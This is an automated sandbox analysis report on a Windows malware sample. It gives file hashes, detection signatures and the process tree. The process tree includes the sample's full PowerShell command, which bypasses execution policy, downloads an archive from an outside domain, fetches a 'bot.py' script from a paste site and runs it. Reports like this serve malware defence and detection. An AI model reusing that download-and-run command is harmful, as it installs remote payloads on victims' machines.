Edit tour
Windows
Analysis Report
3LcZO15oTC.exe
Overview
General Information
| Sample name: | 3LcZO15oTC.exerenamed because original name is a hash value |
| Original sample name: | 2ef8214685189114957214d1ca50c26d.exe |
| Analysis ID: | 1584335 |
| MD5: | 2ef8214685189114957214d1ca50c26d |
| SHA1: | 31569405df7cccd5180f3783449e9c18ecac3ab6 |
| SHA256: | 01fb25581a33b54250dd4b5e66f29552f56ccc89550fb7cbfeb052127447a752 |
| Tags: | exeuser-abuse_ch |
| Infos: |  |
 | |
Detection
| Score: | 92 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Bypasses PowerShell execution policy
Found pyInstaller with non standard icon
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Powershell drops PE file
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
3LcZO15oTC.exe (PID: 7296 cmdline: "C:\Users\ user\Deskt op\3LcZO15 oTC.exe" MD5: 2EF8214685189114957214D1CA50C26D) 
EXCEL.EXE (PID: 7392 cmdline: "C:\Progra m Files (x 86)\Micros oft Office \Root\Offi ce16\EXCEL .EXE" "C:\ Users\user \AppData\L ocal\Temp\ Test.xlsx" MD5: 4A871771235598812032C822E6F68F19) 
splwow64.exe (PID: 3088 cmdline: C:\Windows \splwow64. exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73) 
cmd.exe (PID: 7420 cmdline: C:\Windows \system32\ cmd.exe /c ""C:\User s\user\App Data\Local \Temp\ABC. bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7428 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
powershell.exe (PID: 7472 cmdline: C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.exe -n op -ep Byp ass -windo wstyle hid den -comma nd "[Syste m.Net.Serv icePointMa nager]::Se curityProt ocol = [Sy stem.Net.S ecurityPro tocolType] ::Tls12; I nvoke-WebR equest -Ur i 'https:/ /dk8munok9 87.net/Pyt hon313.zip ' -OutFile "$env:USE RPROFILE\\ AppData\\L ocal\\Temp \\Python31 3.zip"; if (-not (Te st-Path "$ env:USERPR OFILE\\App Data\\Loca l\\Temp\\P ython313") ) { New-It em -ItemTy pe Directo ry -Path " $env:USERP ROFILE\\Ap pData\\Loc al\\Temp\\ Python313" }; Expand -Archive - Path "$env :USERPROFI LE\\AppDat a\\Local\\ Temp\\Pyth on313.zip" -Destinat ionPath "$ env:USERPR OFILE\\App Data\\Loca l\\Temp\\P ython313"; Remove-It em "$env:U SERPROFILE \\AppData\ \Local\\Te mp\\Python 313.zip"; curl -o "$ env:USERPR OFILE\\App Data\\Loca l\\Temp\\P ython313\\ bot.py" 'h ttps://pas te.ee/r/eX FGy/0'; & "$env:USER PROFILE\\A ppData\\Lo cal\\Temp\ \Python313 \\python.e xe" "$env: USERPROFIL E\\AppData \\Local\\T emp\\Pytho n313\\bot. py" " MD5: 04029E121A0CFA5991749937DD22A1D9)
- svchost.exe (PID: 7804 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
⊘No configs have been found
⊘No yara matches
System Summary |   |
|---|
| Source: | Author: Nasreddine Bencherchali (Nextron Systems): | ||